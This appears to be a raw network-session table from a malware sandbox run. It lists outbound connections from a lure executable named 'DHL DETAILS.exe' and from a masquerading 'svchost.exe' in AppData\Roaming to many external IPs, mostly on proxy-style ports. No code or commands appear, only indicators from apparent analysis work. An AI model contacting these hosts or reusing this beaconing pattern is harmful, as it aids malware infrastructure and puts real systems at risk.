Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5361	192.168.2.5	51286	139.198.120.15	29527	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5362	192.168.2.5	50883	117.160.250.134	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5363	192.168.2.5	51899	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5364	192.168.2.5	51291	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5365	192.168.2.5	51907	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5366	192.168.2.5	51924	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5367	192.168.2.5	51465	5.161.179.239	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5368	192.168.2.5	51942	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5369	192.168.2.5	51650	172.67.182.107	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5370	192.168.2.5	51536	45.196.151.97	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5371	192.168.2.5	51660	172.67.200.220	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5372	192.168.2.5	50167	51.222.241.157	5717	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5373	192.168.2.5	51319	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5374	192.168.2.5	51553	159.203.61.169	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5375	192.168.2.5	51252	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5376	192.168.2.5	51369	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5377	192.168.2.5	51417	75.119.145.154	25084	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5378	192.168.2.5	52122	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5379	192.168.2.5	61792	50.62.134.139	36916	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5380	192.168.2.5	52130	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5381	192.168.2.5	51318	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5382	192.168.2.5	51403	54.233.119.172	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5383	192.168.2.5	52131	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5384	192.168.2.5	52135	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5385	192.168.2.5	51423	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5386	192.168.2.5	51443	51.158.108.165	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5387	192.168.2.5	51700	104.17.66.69	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5388	192.168.2.5	51398	88.210.20.144	20000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5389	192.168.2.5	51669	192.252.216.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5390	192.168.2.5	49243	67.201.59.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5391	192.168.2.5	51735	104.21.85.200	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5392	192.168.2.5	51287	124.163.236.54	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5393	192.168.2.5	63751	162.241.50.179	40179	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5394	192.168.2.5	51576	18.228.198.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5395	192.168.2.5	51741	104.18.237.128	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5396	192.168.2.5	50252	113.140.74.26	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5397	192.168.2.5	51598	103.166.141.74	20074	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5398	192.168.2.5	50111	148.72.206.84	14815	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5399	192.168.2.5	51617	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5400	192.168.2.5	51647	147.75.34.86	10010	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5401	192.168.2.5	51644	116.203.28.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5402	192.168.2.5	51670	3.9.71.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5403	192.168.2.5	51862	162.159.242.109	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5404	192.168.2.5	51727	34.83.143.6	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5405	192.168.2.5	51928	104.21.66.184	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5406	192.168.2.5	51940	104.23.107.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5407	192.168.2.5	63745	92.204.134.38	55425	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5408	192.168.2.5	51661	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5409	192.168.2.5	52026	104.20.125.124	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5410	192.168.2.5	51887	45.14.174.180	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5411	192.168.2.5	51989	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5412	192.168.2.5	52053	172.67.14.237	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5413	192.168.2.5	52013	162.159.250.145	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5414	192.168.2.5	49820	140.238.245.116	8100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5415	192.168.2.5	51630	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5416	192.168.2.5	50288	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5417	192.168.2.5	51677	20.24.43.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5418	192.168.2.5	52063	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5419	192.168.2.5	51691	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5420	192.168.2.5	61811	101.133.162.23	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5421	192.168.2.5	52151	104.20.179.187	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5422	192.168.2.5	61989	213.21.56.20	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5423	192.168.2.5	63769	212.79.107.116	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5424	192.168.2.5	51834	177.93.50.164	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5425	192.168.2.5	61869	43.255.113.232	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5426	192.168.2.5	51451	123.241.210.123	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5427	192.168.2.5	52183	172.67.187.242	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5428	192.168.2.5	51632	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5429	192.168.2.5	61781	171.250.222.13	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5430	192.168.2.5	52116	185.162.229.70	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5431	192.168.2.5	51631	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5432	192.168.2.5	52164	72.167.220.46	28810	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5433	192.168.2.5	61935	103.25.210.102	33240	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5434	192.168.2.5	52479	218.145.131.182	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5435	192.168.2.5	52514	218.145.131.182	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5436	192.168.2.5	52521	218.145.131.182	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5437	192.168.2.5	52538	218.145.131.182	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5438	192.168.2.5	51917	94.23.220.136	19547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5439	192.168.2.5	52001	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5440	192.168.2.5	51759	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5441	192.168.2.5	51900	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5442	192.168.2.5	52173	45.61.188.134	44499	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5443	192.168.2.5	52266	104.18.20.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5444	192.168.2.5	51890	193.136.97.17	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5445	192.168.2.5	51975	178.128.82.105	53299	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5446	192.168.2.5	51903	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5447	192.168.2.5	52108	5.252.23.249	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5448	192.168.2.5	52115	81.169.187.194	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5449	192.168.2.5	52240	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5450	192.168.2.5	52058	43.133.136.208	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5451	192.168.2.5	51947	103.127.1.130	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5452	192.168.2.5	52120	47.93.52.36	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5453	192.168.2.5	52137	89.38.99.29	20551	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5454	192.168.2.5	52340	172.67.181.58	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5455	192.168.2.5	52350	104.18.161.122	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5456	192.168.2.5	52252	92.204.134.38	28695	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5457	192.168.2.5	52359	104.24.236.203	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5458	192.168.2.5	62032	186.103.130.91	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5459	192.168.2.5	52386	104.20.89.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5460	192.168.2.5	50411	167.71.5.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5461	192.168.2.5	52294	92.204.134.38	54467	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5462	192.168.2.5	53032	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5463	192.168.2.5	49464	117.160.250.163	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5464	192.168.2.5	53034	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5465	192.168.2.5	52459	104.21.218.103	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5466	192.168.2.5	53043	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5467	192.168.2.5	53055	43.134.230.122	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5468	192.168.2.5	50587	178.128.82.105	39993	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5469	192.168.2.5	52634	172.67.181.144	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5470	192.168.2.5	49270	79.143.187.58	1730	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5471	192.168.2.5	52199	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5472	192.168.2.5	63788	91.134.140.160	51513	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5473	192.168.2.5	52291	93.190.142.57	31243	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5474	192.168.2.5	52582	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5475	192.168.2.5	51639	120.197.40.219	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5476	192.168.2.5	52773	162.159.241.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5477	192.168.2.5	52795	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5478	192.168.2.5	52293	178.54.21.203	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5479	192.168.2.5	52809	184.72.36.89	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5480	192.168.2.5	52273	111.90.150.109	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5481	192.168.2.5	52857	104.24.35.152	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5482	192.168.2.5	52865	104.25.87.42	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5483	192.168.2.5	52605	38.162.3.50	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5484	192.168.2.5	52870	104.16.195.74	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5485	192.168.2.5	52918	185.162.228.170	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5486	192.168.2.5	62092	187.49.191.14	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5487	192.168.2.5	51589	180.250.159.49	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5488	192.168.2.5	52464	114.129.2.82	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5489	192.168.2.5	52994	188.114.99.171	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5490	192.168.2.5	52764	162.120.71.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5491	192.168.2.5	52416	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5492	192.168.2.5	50484	202.144.134.150	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5493	192.168.2.5	49888	174.64.199.82	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5494	192.168.2.5	50728	119.196.168.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5495	192.168.2.5	52854	94.131.60.206	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5496	192.168.2.5	50942	37.187.91.192	11721	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5497	192.168.2.5	52362	20.24.43.214	8123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5498	192.168.2.5	52410	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5499	192.168.2.5	62050	103.121.62.2	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5500	192.168.2.5	52641	45.43.81.44	5691	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
